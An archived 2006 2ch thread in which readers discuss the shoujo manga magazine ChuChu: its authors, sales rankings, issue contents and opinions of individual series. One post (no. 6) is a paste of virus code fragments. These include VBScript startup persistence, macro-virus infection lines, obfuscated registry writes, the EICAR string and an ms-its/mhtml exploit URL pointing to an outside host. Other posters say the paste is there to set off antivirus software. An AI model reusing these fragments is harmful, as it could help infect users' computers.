2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

chuchu ちゅちゅスレッド その3 (小学館)

1 :花と名無しさん:2006/10/10(火) 19:25:41 ID:zVL95NDM0
少女漫画誌”ちゅちゅ”のスレです。

□ おやくそく。
1.各作家のまんがに傾いた話題になってきたら、それぞれの専用スレに移動してくださいね。
2.各作家の専用スレは>>2以降を参照してください。
3.他出版社、他少女雑誌、そしてそれらを比較する話題は、それぞれの専用スレで行ってください。
4.荒らしや自作自演は徹底スルーでお願いします。
5.ちゅちゅに限らず、少女まんがを原作にしたアニメを原作よりで話したい人は
  アニメサロン板の「少女漫画関連&女児向けアニメ」スレに移動しましょう。
6.月刊ちゃおの話題は、下のリンクにある「ちゃお」スレでおねがいね。

公式
http://www.chuchu.jp/

過去スレ
1.http://comic6.2ch.net/test/read.cgi/gcomic/1124005696/l50
2.http://comic6.2ch.net/test/read.cgi/gcomic/1144744370/l50

姉妹スレ:マターリ at ちゃお 〜その21
http://comic6.2ch.net/test/read.cgi/gcomic/1157469537/l50

□ 姉妹誌 
”ちゃお”
ttp://www.ciao.shogakukan.co.jp/
”少女コミック”
ttp://www.sho-comi.com/

2 :花と名無しさん:2006/10/10(火) 19:26:19 ID:zVL95NDM0
”ちゅちゅ” 作家スレ 順(不同)
おおばやしみゆき Part7
http://comic6.2ch.net/test/read.cgi/gcomic/1136484748/
【もう誰にも】しがの夷織【止められない】その2
http://comic6.2ch.net/test/read.cgi/gcomic/1084975631/
陣名まい
http://comic6.2ch.net/test/read.cgi/gcomic/1081319569/
【さゆみん】中村紗弓【MAX!】
http://comic6.2ch.net/test/read.cgi/gcomic/1155821274/
ミルククラウンについて語る■水都あくあ■
http://comic6.2ch.net/test/read.cgi/gcomic/1055654788/
【アクメ】ドキューン♀【アニコン】やぶうち優♂【つぼみ2】
http://comic6.2ch.net/test/read.cgi/gcomic/1146363915/
宮脇ゆきの
http://comic6.2ch.net/test/read.cgi/gcomic/1154830890/


”ちゅちゅ” 作家公式サイト (順不同)
兄崎ゆな       ttp://www5d.biglobe.ne.jp/%7Eanianiko/
おおばやしみゆき  ttp://www.geocities.jp/himatuu/
かわはらなつみ   ttp://blog.livedoor.jp/natsumixchu2/
しがの夷織      ttp://homepage3.nifty.com/shigaponroom/
杉山美和子      ttp://blog.livedoor.jp/sugi_miwa/
高宮智        ttp://strangeparadise.fc2web.com/
七島かな       ttp://www13.ocn.ne.jp/~nanow/top.html
水都あくあ      ttp://aquaizan.com/
溝口涼子      ttp://ip.tosp.co.jp/i.asp?i=zohgu
宮脇ゆきの     ttp://cafe-yuki.seesaa.net/
やぶうち優     ttp://www.dab.hi-ho.ne.jp/yabuuchi/
中村紗弓      ttp://id3.fm-p.jp/39/sayuwor/

3 :花と名無しさん:2006/10/10(火) 19:28:29 ID:???0
ちゅちゅ11月号 は14日頃発売

4 :花と名無しさん:2006/10/10(火) 19:31:05 ID:???0
保守

5 :花と名無しさん:2006/10/10(火) 20:00:12 ID:uwdl+cRu0
サイン色紙に応募にした。

6 :<body onload=window()>:2006/10/10(火) 20:48:09 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2006/10/10(火) 22:16:47 ID:???O
スレ立て乙でございます。

8 :花と名無しさん:2006/10/10(火) 22:40:10 ID:???O
姫香「恥ずいんじゃあ!」
萌え萌えv
姫香戻って来ないかなぁ。

9 :花と名無しさん:2006/10/10(火) 22:40:38 ID:???0
>>7 (;´ー`)y-~~どもー
>>5 がんばれ。

とりあえず変なのが張られてますが、そこは根性で回避してくださいw

10 :花と名無しさん:2006/10/10(火) 22:59:24 ID:???O
ひっめっかー。
漏れの待ち受け姫香たぜ。
最高かわいい。

11 :恋するプリン:2006/10/10(火) 23:53:59 ID:???0
ふと思ったのですが、
兄崎ゆな、しがの夷織のお2人は、ちゅちゅ作家でしたっけ?       

12 :花と名無しさん:2006/10/11(水) 00:17:06 ID:???0
>>11
ちゅちゅスレのてんぷらを引っ張ってきたので……
私もURL先確認時、変だなぁとは思いましたけど。
次スレから外しますか?



13 :花と名無しさん:2006/10/11(水) 00:18:03 ID:???0
兄崎は違うと思うけど…。
しがのは、基本証拠身だけどちゅちゅでも短期連載があって、ちゅちゅコミックス出てるから
入れといてもいいんじゃないかな。

14 :花と名無しさん:2006/10/11(水) 00:21:49 ID:???0
んじゃ、兄崎氏のURLは次スレより外すようにしましょうか?
しがの先生の分はそのままで。

で、ChuChu11月号もう待ちくたびれた.......orz.

15 :花と名無しさん:2006/10/11(水) 01:28:40 ID:???0
しがのさんはヤガミンと一緒で雑誌売上てこいれ出張作家だからちゅちゅでコミクスだしても
ちょっと違うかなーとか思ってる。

16 :花と名無しさん:2006/10/11(水) 01:41:43 ID:???0
プラチナレディーのヒロインと同じだな、器用だから色んな所に投入されちゃう。
そのくせ走り廻った割には報われていない。
昨日はちゃお、今日はChuChu、明日はどっちだ八神千歳。

ChuChu専属にした方が良さそうな気もするが・・・
オールラウンドで描くことの出来る手駒が、少ないんだろうね。>ちゃお/ChuChu編
しかし、本人は何となく好きでやっている気もするからいいか

                                       多分。


17 :花と名無しさん:2006/10/11(水) 13:01:28 ID:???O
>>1さん乙です

それにしてもウイルスコードを貼りまくってる香具師はなんとかならないのだろうか…


18 :花と名無しさん:2006/10/11(水) 18:44:56 ID:???0
私怨ぽいので放置しましょう。
ノートンシスワークス2001や2002じゃウイルスコードとして確認するが
2chビュア自体がVer古いので関係無し。
透明あぼんでOK

新しいバージョン程禄なもんは無い

では、ボケアプコン左右ぶった切り葱をお恨み申します

19 :花と名無しさん:2006/10/11(水) 18:46:43 ID:???0
ノートン2006とか最新のjane使っても反応しますが('A`)
透明あぼんでも無駄

20 :花と名無しさん:2006/10/11(水) 19:18:31 ID:???0
茶汚麺市ね。

21 :花と名無しさん:2006/10/11(水) 19:19:50 ID:???0
来ても居ないのに氏ねとは、何この人

22 :花と名無しさん:2006/10/11(水) 20:52:48 ID:???0
>19
だから最新のVerが最強とか言う幻想から逃れましょうw
定義は内部ソースいじれば2028年までウマー。
で、NAVは基本的に内部はNAV2002のまま
追加された機能はライセンス管理
アップデート系、常駐強化 視覚ガラ
酷いもんだ。毎年買い変えるもんじゃないよ>NAV/NSW/NISは。
本当はこんなもの無くても技術があればワームもスクリプトも潰せる。
ぼったくりシマンテック逝ってよし。

で、明日こそChuChu11月号早売りくるかね。

23 :花と名無しさん:2006/10/11(水) 20:57:47 ID:???O
>>15
しがのさんもやがみんもちゅちゅコミックス一冊出してサヨナラなキガス

24 :花と名無しさん:2006/10/11(水) 21:20:28 ID:???0
>>22
お前が氏ね クラック厨

25 :花と名無しさん:2006/10/11(水) 22:27:40 ID:???0
>23
しがのんも、やがみんも腰が定まらないなぁ。
中村はこのままChuChuの専属になるのかね?
わしゃ、かなり微妙な気もするがw

>24
八当たりいやん、

26 :花と名無しさん:2006/10/11(水) 22:51:04 ID:???O
ナカムリさんの編集後記の文章の癖が気になった。
「食欲も全開さ」
2chに来てるでそ?

27 :花と名無しさん:2006/10/13(金) 00:25:13 ID:???0
さて、今日こそChuChu発売ですな。
夜よはよ明けろ。

28 :花と名無しさん:2006/10/13(金) 09:59:48 ID:PGPd2iRp0
    ☆ チン     マチクタビレタ〜
                        マチクタビレタ〜
       ☆ チン  〃  ∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        ヽ ___\(\・∀・) < ちゅちゅ11月号まだ〜?
            \_/⊂ ⊂_ )   \_____________
          / ̄ ̄ ̄ ̄ ̄ ̄ /|
       | ̄ ̄ ̄ ̄ ̄ ̄ ̄|  |    
       |  愛媛みかん |/


29 :花と名無しさん:2006/10/13(金) 10:26:55 ID:???0
ちゃおなんか小学生のホビー雑誌にしてしまっていいから、

とっとと八神をchuchuに引きずり込めよ!

30 :花と名無しさん:2006/10/13(金) 11:08:10 ID:???O
ちゅちゅにそんなに力を入れる気があるようにも見えないし
やがみんの専属は無理だろ。

けど一作品だけでも大看板がたてれれば
クッキーみたいに安定しそうだよね。
今のままだといつ休刊になるか心配で仕方ない。

31 :花と名無しさん:2006/10/13(金) 11:24:16 ID:???0
けど一作品だけでも大看板がたてれれば

矢沢あいに対抗できる小学館の作家は一人もいない。

32 :花と名無しさん:2006/10/13(金) 11:28:43 ID:???0
文教堂の最新結果はちゅちゅだと毎月15日だっけか?

33 :花と名無しさん:2006/10/13(金) 19:21:18 ID:???0
>矢沢あいに対抗できる小学館の作家は一人もいない。
矢沢あいは片山恭一には負けてるから心配するなや。

それに集英にはさいとうたかをや西岸良平、水島新司などの国民的に認知される
青年漫画家作者がいるのかよ?
まああんな劣悪な糞ヤンジャンからなんてそんな作家出ないよな

34 :花と名無しさん:2006/10/13(金) 19:23:37 ID:???0
小学館スキーでも秋本治だけは貶させない

35 :花と名無しさん:2006/10/13(金) 20:01:27 ID:???0
秋本もビッグコミックに移籍すればいいものを。
さくらももこも移ってきたから

36 :花と名無しさん:2006/10/13(金) 20:02:56 ID:???0
>30
クッキーなんてNANA終わったら廃刊にしてもおかしくないだろ。
他の単行本なんて大して売れてないし

37 :花と名無しさん:2006/10/13(金) 20:20:40 ID:???0
おおばやしみゆき作品を何か一つアニメ化すれば一発だ

38 :花と名無しさん:2006/10/13(金) 20:41:38 ID:???O
>>36
NANA終わってもまた矢沢に連載させれば廃刊にはならんでしょ
そう意味で看板作品じゃなくて看板作家が必要かと

39 :花と名無しさん:2006/10/13(金) 20:59:22 ID:???0
看板は多分、みんなの深層意識では居るみたいだな、
しかし今その選択肢を採るとCguChuの方向性が歪む危険性がある。

つうことが今までの流れで分かった。


40 :花と名無しさん:2006/10/13(金) 22:52:31 ID:???O
水都をちゃおに、やがみんをちゅちゅにトレードしてほしい
まわりが純愛漫画ばかりで水都のトンデモ学園漫画が浮いてきてるような・・

41 :花と名無しさん:2006/10/13(金) 23:48:59 ID:???0
やがみんは水都さんに比べて作家として弱くない?
絵看板・・・水都さん 話看板・・・ばやしさん
だろうけど、絵看板にやがみんはしっくりこないな。
絵も話もいける2番手3番手として常に一定の人気がある器用貧乏な人。
トレードしたらちゃおにプラスはなるだろうけどちゅちゅは華やかさが減る分売上にはプラスにならなさそう。
後、少コミとちゃお出身作家バランスも悪くなる。少コミ落ち読者ひっぱれないよ。
ただでさえ水都さん以外の少コミ側作家陣が足をひっぱってるのに。

>>40
陣名さん。
ある意味水都さんよりぶっとんでると思う。

42 :花と名無しさん:2006/10/14(土) 00:06:44 ID:???0
やがみんは少し黒成分をばやしさんから分けてもらうと
いい感じに化けると思うw

43 :花と名無しさん:2006/10/14(土) 00:09:15 ID:???O
>40
やがみんの絵は可愛いし、ちゃお受けしてるから
ちゃお卒業読者をもってくるにはいいかもしれないね。


44 :花と名無しさん:2006/10/14(土) 00:42:39 ID:???0
>>42
それだと劣化ばやしさんになりそう。やっぱり牽引力にはならないww
やがみんはあの毒も薬にもならない作風が良さだと思ってる。

45 :花と名無しさん:2006/10/14(土) 02:57:29 ID:???O
個人的に好きな作家じゃないが少コミからアフォ木たん連れてきて
今少コミでやってるやつみたいにエロ抜き漫画かかせれば
ちゅちゅのイメージには合うかもとオモタ。

さゆみんや宇佐見とか現状の少コミ組は
移籍というよりリストラ都落ちにしかみえないし。

46 :花と名無しさん:2006/10/14(土) 11:07:33 ID:???0
>>34
確かに秋本のような老化した作家が
小学館には多数いらっしゃるからね。

47 :花と名無しさん:2006/10/14(土) 11:39:09 ID:???0
トーハンPOS全店売上ベスト200だと

ちゅちゅからのランクインは

8月 138位 さくら前線 1巻(7/29〜)

9月 157位 ALMIGHTY×10 2巻(9/01〜) 

のみみたいだ。看板でこの程度って売れてない…

48 :花と名無しさん:2006/10/14(土) 13:04:55 ID:???0
で、11月号なんだが、表紙がかなりアレっぽくなっているぞ。
さすが、ゆきのん表紙w

対象年齢が、気持ち1歳分若返った気がした。
いい意味でね。しかしゆきのん二本建てとは
確かに看板問題を考えないといけないねぇ
小コミからもう一、二名テストでひっぱれないかな。
池山田は外してね、断腸の思いでね

49 :花と名無しさん:2006/10/14(土) 14:25:16 ID:???0
ゆきのんをバカにするな

50 :花と名無しさん:2006/10/14(土) 15:34:53 ID:???0
>47
モンキャンはどれくらいだったか知りたいな。

51 :花と名無しさん:2006/10/14(土) 15:46:02 ID:???0
あった。
ttp://72.14.235.104/search?q=cache:8tK28UmITUkJ:comic6.2ch.net/test/read.cgi/ymag/1133959291/35n-
093位 モンスターキャンディー 2巻(10/31〜)

52 :花と名無しさん:2006/10/14(土) 18:43:32 ID:LB0nVEEf0
>看板でこの程度って売れてない…

そうはいっても、ちゃおだってランク入りするのはアニメ化作家と
八神と、たまごっちだけという事実。

53 :花と名無しさん:2006/10/14(土) 19:11:34 ID:???O
>>48
少コミの深海魚・さとりたえ・山中リコ・千葉コズエ、
別コミの尾崎衣良・菊地かまろ・有田優佳あたりがきてくれたらよいが、
看板にはなりそうにない…。

七島たんのコミックスが出るので嬉しい。

54 :花と名無しさん:2006/10/14(土) 21:15:52 ID:???0
ちゅちゅは二本立て多いな。席が余りぎみなのか?

55 :花と名無しさん:2006/10/14(土) 21:19:06 ID:???0
壁紙キター!
陣名ーーー!

56 :花と名無しさん:2006/10/14(土) 21:33:59 ID:???0
ALMIGHTY×10の2巻が9月ではランクインしているのを見ると
8月は厳しい月だったんじゃないか?夏休みだし
多分、アニコン1巻、ALMIGHTY×10一巻あたりは他の月ならランクインしていた
と思いたい。

57 :花と名無しさん:2006/10/14(土) 21:45:12 ID:???0
後はさくらは発売日が7月発売の初動が反映されてないのもあるんじゃないかな。
私もさくら買ったの発売日だし8月に出ればまたもう少し順位は上がったんじゃない?

58 :花と名無しさん:2006/10/14(土) 22:16:26 ID:???0
欲しいグッズあるから通販利用しようと思ったら送り先が知り合いの職場だよorz
本名じゃ絶対送れない。

59 :花と名無しさん:2006/10/14(土) 22:23:00 ID:???0
ヒント:家族の名前

60 :花と名無しさん:2006/10/14(土) 22:46:58 ID:???0
>>59
そ れ だ!
ありがとう!これで心おきなく買いまくるYO!

61 :花と名無しさん:2006/10/14(土) 23:07:26 ID:???0
>>59
頭いいーー!

さて、○○○○っと、年齢…あ……

62 :花と名無しさん:2006/10/14(土) 23:16:35 ID:???O
右膝でおっぱいがぐにゅうってなってるの?>表紙

63 :花と名無しさん:2006/10/14(土) 23:20:12 ID:???O
すんごい、すんごくイイ!
陣名クリスマスカード!

64 :花と名無しさん:2006/10/14(土) 23:32:19 ID:???O
ライバルに☆メリークリスマス
おっぱいワシづかみ?

65 :花と名無しさん:2006/10/15(日) 00:47:27 ID:???O
漫画救急室、姫香だぁv

66 :花と名無しさん:2006/10/15(日) 01:11:03 ID:???O
ずしーんと、カツ丼の如く食べ応えあったな。>さくら
本領発揮。

67 :花と名無しさん:2006/10/15(日) 01:30:36 ID:???O
委員会よくなったね。
作文教室もドキドキだー。

68 :花と名無しさん:2006/10/15(日) 12:04:22 ID:???0
>>55
お、ホントだ。しかもパスワードを必死に探したのに、ページ数が書いてあった
親切だな

69 :花と名無しさん:2006/10/15(日) 12:43:52 ID:???O
ジッパー外すと下はどうなってるんだろう。

70 :花と名無しさん:2006/10/15(日) 19:25:35 ID:???O
委員会イケメン美術室。
ランク外
>女装が似合う男の子
マニアッーク!

71 :花と名無しさん:2006/10/15(日) 23:57:50 ID:???0
結局そこに落ち着くのかいw
今回も高宮センセのモノトーンで静かな漫画がよかった

72 :花と名無しさん:2006/10/16(月) 13:23:31 ID:???0
最新の文教堂、先月比でほぼ横ばい。

(10月16日更新)
14 (14) 1611110 ちゅちゅ 小学館 20060914 1161

創刊からの文教堂売上推移
1月号 ちゅちゅ 1693
2月号 ちゅちゅ 1472
3月号 ちゅちゅ 1341
4月号 ちゅちゅ 1292
5月号 ちゅちゅ 1294 
6月号 ちゅちゅ 1279
7月号 ちゅちゅ 1231
8月号 ちゅちゅ 1247
9月号 ちゅちゅ 1157
10月号 ちゅちゅ 1161

73 :花と名無しさん:2006/10/16(月) 13:26:00 ID:???0
chuchuもうだめぽ。

74 :花と名無しさん:2006/10/16(月) 14:01:21 ID:???0
まだだ、まだ終わらんよ。

75 :花と名無しさん:2006/10/16(月) 14:33:50 ID:???O
天麩羅マダー?
っつか使ったらみんなかくかな。

76 :花と名無しさん:2006/10/16(月) 16:21:48 ID:???0
自分でやれ

77 :花と名無しさん:2006/10/16(月) 16:50:22 ID:???O
自分でやろうかと思ったけど自分以外使わないとさみしいなとオモタ

時間あったら家に帰ったら作りますわ

78 :花と名無しさん:2006/10/16(月) 19:13:51 ID:???0
その前にまず熟読せねばならんな

79 :花と名無しさん:2006/10/16(月) 19:38:18 ID:???O
熟読どころか流し読みすらもする気がおきない作品が
ちらほらとある…orz

80 :花と名無しさん:2006/10/16(月) 21:42:23 ID:???0
天婦羅投下。こんなんでいいかね。

【表紙/ゆきのん】
【NG/ゆきのん】
【さくら/ばやし】
【おまえは(新)/にみ】
【世界一/さゆみん】
【AL10/水都】
【トナリの(デビュー)/こはく】
【センセイ(読切)/八神】
【ひとつ屋根/宇佐美】
【行ったもん/陣名】
【おくすり/高宮】
【イタコ/笹木】
【好きグレ/陣名】
【次回予告(やぶ・七島新連載/白鳥・きらら読切)】

別冊
【"好き"と/ゆきのん】
【目覚めに/七島】
【片道切符/白鳥】

81 :花と名無しさん:2006/10/16(月) 23:46:48 ID:???0
“”

カッコはこれだよ

82 :とんでぶーりん:2006/10/17(火) 01:30:02 ID:???0
>カッコはこれだよ
なんかカッコイイ!

83 :花と名無しさん:2006/10/17(火) 18:05:12 ID:???0
白鳥いらNEEEEEEEEEEEEEEEEEEEEEEEEEEEE!!!!

84 :花と名無しさん:2006/10/17(火) 21:17:46 ID:???0
白鳥いいから姫川をなんとかしてくれ。

85 :花と名無しさん:2006/10/18(水) 03:07:25 ID:???0
にみにみの新連載わろすwwww

86 :花と名無しさん:2006/10/18(水) 10:57:53 ID:???0
低学年向けのちゃおでもないし、エロエロの少コミでもないのに、
短期漫画で済まそうとしているのが間違いだな。

87 :花と名無しさん:2006/10/18(水) 11:47:34 ID:???O
白鳥さんの今回の読み切りは結構良かったと思う。
それよりもゆきのんの読み切りツッコミ所あり杉!
特にラスト、友達の前で二人の世界創るぬ!
七鳥さんのは普通に良かった。新連載にも期待。


88 :花と名無しさん:2006/10/18(水) 20:54:39 ID:???0
せっかくなので天ぷら使ってみる。

【表紙/ゆきのん】 前の時の表紙よりは良いと思う。
【NG/ゆきのん】 可不可なく安心して読める。
         雑誌にひとつくらいはこういう漫画必要かも。
【さくら/ばやし】 横顔は相変わらずキモイけど、内容は面白い。
【おまえは(新)/にみ】 表紙のひどさにスルーしていたんだが、
           読んでみたらにみの漫画で初めて面白いと思った。
【世界一/さゆみん】 半スルー。どんどんキャラがいやな奴に
          なっていくのがさゆみんわーるどなのか?
【AL10/水都】 見せ方とかうまいとは思うんだけど、飽き気味。
【トナリの(デビュー)/こはく】 顔以外は新人だけあって(?)下手。
               種っぽさが気になるが、デビュー一号ガンガレ。
【センセイ(読切)/八神】 作画早そうだし、部数減少を救うべく
            チュチュでも連載してみたらどうかね。
【ひとつ屋根/宇佐美】 読む気にならないのでスルー。
【行ったもん/陣名】 マイネームりんごの写真がみたい。
【おくすり/高宮】 次作はもっとマニアックな高宮ワールドを見たい。
【イタコ/笹木】 スルー。
【好きグレ/陣名】 終わっちゃった・・・。さゆみん終わらせていいから
         こっちが読みたかった。
【次回予告(やぶ・七島新連載/白鳥・きらら読切)】
 きららいらない。七島タソもだけど、やぶの連載もちょっと楽しみだったり。

別冊
【"好き"と/ゆきのん】 上で書いてる方がいたけど、失恋で傷心の友達の前で
           キスシーンするなよ。あとこれって「バイト・コスチューム編」
           じゃなくてもいいんじゃないか?
【目覚めに/七島】 七島タソは嫌いじゃないが、七島タソの書く男はやっぱり苦手だ。
【片道切符/白鳥】 昔の絵に戻してくれ。ロリっぽすぎてキモ。

総評:宇佐美消えてくれ。にみ今回のは今までの連載の中じゃ一番面白そうだ。ガンガレ。

89 :花と名無しさん:2006/10/18(水) 23:52:29 ID:???O
コスチュームでまとめるならミニスカ☆チェンジやればいいのに。
後は美少女戦隊ものを陣名先生にお願いするとか。
宮脇さんのはパジャマがコスチューム?
編集者の能力が圧倒的に不足してる気がする。

90 :花と名無しさん:2006/10/19(木) 00:02:28 ID:???O
男キャラはちゃんと男っぽく描いて欲しいな。
女顔にヒゲつけて店長とかおじいさまとか、いただけないな。
ヒーローは柔らかい感じでもいいけど脇キャラが男っぽいとひき締まると思いますよ。

「だったらお前が描けよ!」
すみません、すみません。

91 :花と名無しさん:2006/10/19(木) 00:07:36 ID:???0
がんがれ。

92 :とんでぶーりん:2006/10/19(木) 00:10:41 ID:???0
姫川きらら先生、超楽しみ!きららイイよ。何よりペンネームが最高だよ。

93 :花と名無しさん:2006/10/19(木) 00:30:36 ID:???0
意図的に漫画家売り込んでないかいっ?
まっ、別に面白ければ私はいいのさっ!


だから、やがみんに安住の地を与えてください。
お願いします、このままでは前のめりに倒れそうだ。

94 :花と名無しさん:2006/10/19(木) 06:52:29 ID:???0
陣名の「好きグレ」は続けさせて良かったと思うな。
今までの中で一番良かったし。次もこれが出せるとは限らないし。
シリーズ復活希望。

95 :花と名無しさん:2006/10/19(木) 09:58:04 ID:???0
( ´゚д゚)(゚д゚` )ネー

次は香クンをめぐって争奪戦…は無いか…
どう続けるんだ

96 :花と名無しさん:2006/10/19(木) 11:25:56 ID:???0
流れと関係なくて悪いが、
「AL10」と「わたしの」の投稿ページの「編集部からのお知らせ」ってなんなんだ?
「住所が分からなくて景品が送れない」って奴なら見た事あるが。

97 :花と名無しさん:2006/10/19(木) 12:15:18 ID:???0
>>94
編集部はさゆみんみたいな
せつない少女漫画〜って感じの人しかプッシュしてないように思える
予告見る感じ、やぶうちさんも次はその路線みたいだし

98 :花と名無しさん:2006/10/19(木) 12:42:14 ID:???0
>96
ほんとだ気付かなかった。
激ラブ応援メッセージってなんだ?ファンページのこと?
該当する名前が見当たらないんだけど、もしかして
ペンネームで載せてるのに本名で呼びかけてるのか?

99 :花と名無しさん:2006/10/19(木) 21:56:03 ID:???0
>95
元ヤン時代のケンカ相手(女)に自分だけ幸せになりやがって!と恨まれて
色々妨害されたり、それと和解した後彼氏を世話してみたり。
そんな中、そんなおせっかいはよせと怒られ、何でそんなこと言うの!
と、喧嘩が始まっちゃったり、友達優先されて嫉妬したと言われて
きゅんとしたりして和解したりすればいい。

100 :とんでぶーりん:2006/10/20(金) 00:10:35 ID:???0
>98
扉に載ってます。

101 :98:2006/10/20(金) 00:17:39 ID:???0
あーなるほどthx
イラストなら盗作疑惑?とかかと思ったけど
なんなんだろねこれ

102 :96:2006/10/20(金) 06:50:34 ID:???0
>>100
thx
気付かなかった

なんなんだ気になる…


103 :花と名無しさん:2006/10/21(土) 10:37:38 ID:Rjh9pDjj0
>>96 漏れも気になったとこ

104 :花と名無しさん:2006/10/23(月) 15:58:37 ID:???0
【表紙/ゆきのん】先月よりGood
【NG/ゆきのん】まずまず
【さくら/ばやし】面白い?
【おまえは(新)/にみ】まぁまぁ
【世界一/さゆみん】スルー
【AL10/水都】1番面白い 扉が可愛かった
【トナリの(デビュー)/こはく】デビュー作にしてはまぁまぁ
【センセイ(読切)/八神】 面白い
【ひとつ屋根/宇佐美】少コミへ
【行ったもん/陣名】 スルー
【おくすり/高宮】 面白い
【イタコ/笹木】 スルー
【好きグレ/陣名】 まずまず
【次回予告(やぶ・七島新連載/白鳥・きらら読切)】 やぶサンと七島サンが
楽しみ

別冊
【"好き"と/ゆきのん】まずまず
【目覚めに/七島】男キャラをどうにかして…
【片道切符/白鳥】 スルー




105 :花と名無しさん:2006/10/24(火) 02:49:46 ID:???O
>>104
行ったもん勝ちをスルーするのはもったいないゾ☆
短い続き物じゃないから暇な時読んでみては?

106 :花と名無しさん:2006/10/24(火) 10:37:06 ID:xD5z8+Xm0
【表紙/ゆきのん】・・・・・。
【NG/ゆきのん】まぁ普通に面白い
【さくら/ばやし】面白い
【おまえは(新)/にみ】つまんない
【世界一/さゆみん】スルー
【AL10/水都】結構面白い
【トナリの(デビュー)/こはく】スルー
【センセイ(読切)/八神】 面白かった
【ひとつ屋根/宇佐美】消えろ。
【行ったもん/陣名】 いつも通り面白い
【おくすり/高宮】 結構面白い
【イタコ/笹木】 いつも通り
【好きグレ/陣名】 面白かった
【次回予告(やぶ・七島新連載/白鳥・きらら読切)】 白鳥、きららはスルー

別冊
【"好き"と/ゆきのん】普通
【目覚めに/七島】まぁ普通に面白い
【片道切符/白鳥】 スルー





107 :花と名無しさん:2006/10/24(火) 10:46:44 ID:???O
訂正ですスマソ
>>105
誤:短い続き物じゃない
正:短いし、続き物じゃない


108 :花と名無しさん:2006/10/25(水) 00:23:20 ID:???0
さくら前線はこの雑誌の中でストーリーが一番よいと思う。
ドラマ化キボン。o0(さくらドラマ化→ちゅちゅがメジャー雑誌に→みんなウマー)

HPの次号予告に「なっとくポンチ」がない。。。この所どうしちゃったの?ポンチ!!(涙)

109 :花と名無しさん:2006/10/26(木) 21:32:46 ID:???0
マイナーコミックのドラマ化は
原作が意味ないくらい変えられることが多いからヤダ。
タイトルすら変えられて気づかなかったことがある。
コミックス売り上げもたいして上がらないらしいよ。

雑誌はドラマがヒットしても売り上げは変わらないと思う。
NANAが売れててもクッキー売れてないじゃん。

110 :花と名無しさん:2006/10/28(土) 12:47:52 ID:???O
さくらがドラマ化したら
由紀と武がジャニーズになって、
主題歌もジャニ歌になる可能性大だからやめてくれ…。

111 :花と名無しさん:2006/10/28(土) 16:28:32 ID:???0
ばやしさんは売れるなら、ジャニでも何でもオッケー出しそうだな

112 :花と名無しさん:2006/10/28(土) 18:08:47 ID:???0
姫川の絵は相変わらず酷いな

113 :とんでぶーりん:2006/10/28(土) 22:19:17 ID:???0
そんなに悪くないと思うけど。むしろ、味絵。
この掲示板で、きららファンは私だけかな?

114 :花と名無しさん:2006/10/29(日) 13:43:39 ID:???0
姫川の絵は酷いわけではないと思う、ただ古くさくて受け付けないなぁ
話もだけど。

115 :花と名無しさん:2006/10/29(日) 17:44:28 ID:???0
PN自体ちょっと古風というかズレてる感じがあると思うのは俺だけだろうか

116 :花と名無しさん:2006/10/29(日) 18:00:15 ID:???0
30年位前の少女漫画(上原きみ子とか)っぽい

117 :とんでぶーりん:2006/10/29(日) 19:31:16 ID:???0
うんうん、まさにそれらの部分がツボ♪
その古臭さが、今では逆に新鮮。ちょっと邪道な楽しみ方かも。
受け付けない人の気持ちもよく分かるけどね。

118 :花と名無しさん:2006/10/29(日) 21:22:07 ID:???0
>>115
他誌ですまんが、「鈴木ジュリエッタ」ってのも凄かったな。

119 :115:2006/10/29(日) 21:27:06 ID:???0
>>118
何と言うか…
そこまでいくと逆に思い切りが良くて気にならんかもしれん

120 :花と名無しさん:2006/10/29(日) 21:40:34 ID:???O
きららタソの絵は古いし濃いし好きじゃないが
プロらしい原稿にはなってると思う。

落書きレベルの宇佐見タソよりは好感もてるなぁ。

121 :花と名無しさん:2006/10/29(日) 22:04:41 ID:???0
>120
あー、禿同。
何度読もうとしても、宇佐美は目がスルーする。
その点きららタソはちゃんと読めるなぁ。

122 :花と名無しさん:2006/10/30(月) 16:18:20 ID:???O
きららたんは、殴り合いのシーンが面白過ぎたので
ギャグマンガ家と認識してます。

123 :花と名無しさん:2006/10/30(月) 18:55:39 ID:???0
>>120
確かに。
でもリア受けするのはウサミの方っぽいよね…

124 :花と名無しさん:2006/10/30(月) 19:33:41 ID:???0
個人的には創刊号(だったけ?)に載ったDQN達が
ヒロインに生卵ぶつけるシーンが笑える


125 :花と名無しさん:2006/10/31(火) 13:51:09 ID:???O
きららタソは独特の台詞回しが(ある意味)魅力です。
ex.しゃらくせー!、この泥棒猫!

ところで11月のChuChuコミクス発売まだー(AA略)

126 :花と名無しさん:2006/10/31(火) 17:23:37 ID:???0
きらら新聞w

127 :花と名無しさん:2006/10/31(火) 23:19:10 ID:???0
きららタン年いくつなの?
若くはないと思うけど・・

128 :とんでぶーりん:2006/11/01(水) 00:03:39 ID:???0
29歳希望!たまらん!

129 :花と名無しさん:2006/11/01(水) 00:57:24 ID:???0
デビュー(去年の7月発表)のときに28歳だから
今は29か、投稿〜発表までに誕生日があるなら30

130 :とんでぶーりん:2006/11/01(水) 02:39:36 ID:???0
